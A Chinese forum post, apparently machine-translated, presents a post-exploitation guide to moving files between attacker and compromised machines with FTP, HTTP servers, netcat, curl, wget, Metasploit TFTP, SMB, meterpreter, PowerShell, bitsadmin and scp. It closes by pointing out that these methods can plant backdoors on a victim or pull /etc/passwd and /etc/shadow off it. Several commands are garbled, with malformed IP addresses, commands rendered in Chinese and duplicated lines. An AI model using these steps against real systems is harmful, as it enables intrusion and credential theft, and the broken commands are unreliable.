压缩文件传输指南(后利用)

在渗透测试中,当我们从网络中的受感染机器或其他主机传输或下载任何文件时,通常会遇到困难。因此,今天您将了解从受感染或其他主机系统下载任何文件时应遵循的方法。以下所有方法都有助于渗透测试,也可用于一般用途。
让我们开始!!
文件传输协议(FTP)
你们都熟悉FTP服务器的工作,让我们从FTP服务开始今天的教程。
当您发现端口21已打开时,表示FTP服务正在远程计算机上运行, 并且您正在寻找从目标计算机下载文本文件,然后您可以按照以下2种方法进行操作。
1所第一方法中使用的命令行
首先使用主机IP连接到ftp服务器,输入login credential,然后执行带有要下载的文件名的get 命令。
ftp 192.168.1.106
get raj.txt
ftp 192.168.1.106
get raj.txt
2 第二方法使用浏览器
通过在URL中添加主机IP为ftp://192.168.1.106,可以使用浏览器执行相同的工作,输入用户名和密码进行身份验证并下载文件。
安装Python FTP服务器
通常很多人首选vsftpd服务器用于FTP服务,通过端口21共享文件,但如果你与vsftpd不兼容,那么你可以使用第二个选项“Python FTP服务器”,它将允许通过端口21共享文件。
sudo apt-get install python-pyftpdlib
sudo apt-get install python-pyftpdlib
在这里,我想只访问特定文件夹“aarti”来共享其数据。
sudo python -m pyftpdlib -p 21
sudo python -m pyftpdlib -p 21
因此,当主机将在URL“ ftp://192.168.1.103 ”中输入目标地址并且您将获得匿名登录时,现在下载该文件。
超文本传输 协议(HTTP)
通过网络目录“html”共享文件
另一个最着名的文件传输服务是使用端口80的HTTP服务。应该在您的机器中激活服务apache以通过Web目录传输文件,然后您可以将任何文件移动到HTML目录以通过http服务共享它。
所以这里我们通过以下命令将putty.exe文件转换为html。
cp putty.exe /var/www/html
cp putty.exe /var/www/html
现在让我们从目标服务器下载putty.exe到我们的机器中。打开您喜欢的浏览器并通过URL中的服务器地址192.168.1.106/putty.exe浏览文件。通过应用此技术,您可以访问Web目录内的任何文件,即目标计算机的/ var / www / html。
通过Python Http服务器共享
如果你不兼容上面的http方法,那么你选择第二个选项“Simple Http server”,它也是一个使用端口80通过Web浏览器在网络中共享文件的python脚本。
在这里,我再次只想访问特定文件夹“demo”来共享其数据。
python -m SimpleHTTPServer 80
python -m SimpleHTTPServer 80
因此,当主机将在URL“ http://192.168.1.108 ”中输入目标地址并且您将获得共享文件夹的访问权限时,现在下载该文件。
HFS工具
在上面的Http文件共享方法中,我们使用Ubuntu和Linux通过端口80传输文件,并允许其他主机通过Web浏览器下载。
现在,如果您是Windows用户,那么您可以使用HTS工具执行相同的工作。它是不同平台之间最流行的工具使用文件传输。
脚步:
下载HFS并运行该应用程序
现在,通过Web浏览器拖放要共享的文件。
现在,当其他主机的用户将在其Web浏览器中以URL http://192.168.1.105打开Windows IP时,他可以下载Shred文件。
Netcat的
Netcat被称为瑞士刀,用于多种用途,因此我们将在文件传输中使用它。
使用以下命令从目标服务器下载共享文件
语法: nc [options] [监听端口]> [存储下载文件的路径]
nc -lvp 5555 > /root/Desktop/raj.txt
nc -lvp 5555 > /root/Desktop/raj.txt
键入以下命令,以将任何文件共享到网络中的主机。
语法: nc主机IP主机端口<file.txt
nc 192.168.1.108 5555 < raj.txt
nc 192.168.1.108 5555 < raj.txt
现在您可以观察到我们已经在主机的桌面上成功下载了raj.txt文件。
卷曲
Curl命令行工具,用于使用各种协议传输数据。并且还用于从任何网站或主机下载数据,以下命令将从网站下载putty.exe文件。
curl -O http://192.168.1.106/putty.exe
curl -O http://192.168.1.106/putty.exe
同样执行以下命令下载putty WWW。
curl -O https://the.earth.li/~sgtatham/putty/latest/putty.exe
curl -O https://the.earth.li/~sgtatham/putty/latest/putty.exe
wget的
执行以下命令下载特定文件。下载的文件存储在当前目录中。它 通过下载文件指示下载进度,  大小,  日期  和  时间。
输入以下命令从apache服务器的html目录下载任何文件。
wget http://192.168.1.106/putty.exe
wget http://192.168.1.106/putty.exe
同样执行以下命令下载putty WWW。
wget https://the.earth.li/~sgtatham/putty/latest/putty.exe
wget https://the.earth.li/~sgtatham/putty/latest/putty.exe
普通文件传输协议(TFTP)
TFTP服务用于使用远程连接读取和写入任何文件,它使用UDP端口69来共享文件,不使用身份验证,因此它不如FTP安全。
在这里,我在tftp文件夹中创建了一个demo.txt文件,用于共享。
Metasploit包含一个为文件共享提供tftp服务的模块。
use auxiliary/server/tftp
msf auxiliary(server/tftp) > set srvhost 192.168.1.108
msf auxiliary(server/tftp) > set TFTPROOT /root/tftp
msf auxiliary(server/tftp) > exploit
use auxiliary/server/tftp
msf auxiliary(server/tftp) > set srvhost 192.168.1.108
msf auxiliary(server/tftp) > set TFTPROOT /root/tftp
msf auxiliary(server/tftp) > exploit
现在打开命令提示符并执行以下命令,以便在您的系统中下载demo.txt文件。
语法: tftp -i host IP GET file name.txt
tftp -i 192.168.1.108 GET demo.txt
tftp -i 192.168.1.108 GET demo.txt
从下面给出的图像中可以看出,它已将商店下载到当前目录中。
SMB服务器使用Python脚本
现在我们将使用一个python脚本来激活Linux机器中的SMB服务。您可以访问github获取此python脚本。
我从github复制了python代码并将其作为桌面文件夹中的smbserver.py传递到文本文件中。现在为共享文件夹“raj”执行以下命令。
python smbserver.py raj/root/share
python smbserver.py raj/root/share
从Windows机器中的Linux SMB服务器下载文件
由于我们知道在主机192.168.1.108中运行并使用窗口平台的smb服务,我们可以通过运行命令提示符访问它的共享文件夹。
因此,您可以观察到我们已成功访问文件夹“raj”并找到两个文本文件用户并传入它。
这样我们就可以使用smb python脚本在windows和Linux机器之间共享文件。
从Ubuntu Machine中的Linux SMB服务器下载文件
如果您是Ubuntu用户,则可以使用smbclient服务访问smb服务器的共享文件夹。
apt-get install smbclient
apt-get install smbclient
现在执行下面给出的命令来访问服务器的共享文件夹。
smbclient -L 192.168.1.108
smbclient -L 192.168.1.108
观察到它显示的共享文件夹是“RAJ”
现在执行以下命令来访问共享文件夹raj并下载其中的数据。
smbclient //192.168.1.1.108/raj
smbclient //192.168.1.1.108/raj
由于文件夹raj有两个文本文件user.txt和pass.txt,我们将通过以下命令下载user.txt。
获取user.txt
通过Meterpreter下载文件
在渗透测试中,当我们使用metasploit攻击目标机器并拥有他的meterpreter会话时,在meterpreter内部我们可以执行以下命令从受害者的机器下载任何文件。
meterpreter> download raj.txt /root/Desktop
meterpreter> download raj.txt /root/Desktop
使用Cat命令
Cat是非常漂亮的命令,如果您明智地使用它可以执行非凡的工作,假设您在主机中找到任何文本文件而您无法下载它然后通过cat命令打开该文件。
例如:我想知道user.txt中的文本,然后我将执行以下命令,然后将该文本复制到新的文本文档中并将其保存在我们的机器中。
使用Window PowerShell下载文件
如果您是Windows用户并具有命令shell访问权限,则可以选择PowerShell以下载任何Web服务器文件。以管理员身份在命令提示符中执行以下命令。
电源外壳
(new-object System.Net.WebClient).DownloadFile('http://192.168.1.1.106/putty.exe',’d:\data\putty.exe')
(new-object System.Net.WebClient).DownloadFile('http://192.168.1.1.106/putty.exe',’d:\data\putty.exe')
从下面的图片中你可以看到我们已经成功地在d:drive中下载了putty.exe。
使用BITSAdmin下载文件
BITSAdmin是窗口平台的命令行实用程序,允许用户下载和上载文件。如果要从http下载任何文件,则可以使用以下命令。它与在admin特权下的PowerShell工作类似。因此,以管理员身份运行cmd并执行以下命令以下载putty。
bitsadmin /transfer job https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe F:\putty.exe
bitsadmin /transfer job https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe F:\putty.exe
现在它将开始下载并在下载时提供更新,例如作业类型,即下载,优先级和状态。
我们已经在f:drive中下载了putty.exe。
通过PHP共享文件
PHP也是avialabe用于相同目的,当上述方法不兼容两个主机之间共享文件时。您需要执行以下commnad才能打开HTTP侦听器。如您所知,我已在桌面上保存了一个shell脚本,因此我们在Desktop上运行命令。
php -S 0.0.0.0:80
php -S 0.0.0.0:80
现在您可以使用wget或其他应用程序从远程地址下载shell脚本,即192.168..1.103 / shell.elf
SCP文件传输
安全复制协议(SCP)是一种在本地主机和远程主机之间或两个远程主机之间安全地移动任何文件的方法。它基于Secure Shell(SSH)。在这里,我在/ home / raaz中创建了一个新文件scp.txt,然后尝试使用以下命令将此文件传输到远程计算机。
语法: scp SourceFile user @ host :〜/ path of path
scp scp.txt aarti@192.168.1.105:~/
scp scp.txt aarti@192.168.1.105:~/
现在让我们通过检查远程目录来确认转换,你可以看到我们已经在远程pc中成功收到了scp.txt文件。
类似地,我们可以将任何后门从攻击者机器转移到受害者的机器,或者可以从受害者的机器上复制一些系统文件,例如/ etc / passwd和/ etc / shadow。
转载请注明本文链接: http://www.mayidui.net/t2288.html
话题: 渗透
游客
登录后才可以回帖,登录 或者 注册